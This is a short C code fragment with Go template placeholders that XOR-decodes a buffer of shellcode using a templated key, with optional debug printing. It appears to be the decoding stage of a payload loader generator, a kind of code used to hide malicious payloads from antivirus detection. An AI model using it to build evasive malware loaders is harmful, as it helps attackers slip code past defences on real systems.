
    const char * key = "{{.Key}}";

    {{if .Debug}}
    printf("[*] Xor Decoding shellcode\n\tBytes Before %x %x %x\n\tshellcodelen %x\n",shellcode[0], shellcode[1], shellcode[2], shellcodeLen);
    {{end}}

    unsigned char * decrypted = calloc(shellcodeLen, sizeof(unsigned char));

    // decrypt data (xor decrypt)
    for (int i = 0; i < shellcodeLen; i++){
        decrypted[i] = shellcode[i] ^ key[i%strlen(key)];
    }

    {{if .Debug}}
    printf("Xor complete\n");
    {{end}}

    memcpy(shellcode, decrypted, shellcodeLen);

    {{if .Debug}}
    printf("[*] Xor Decoding complete\n\tBytes After %x %x %x\n",shellcode[0], shellcode[1], shellcode[2]);
    {{end}}
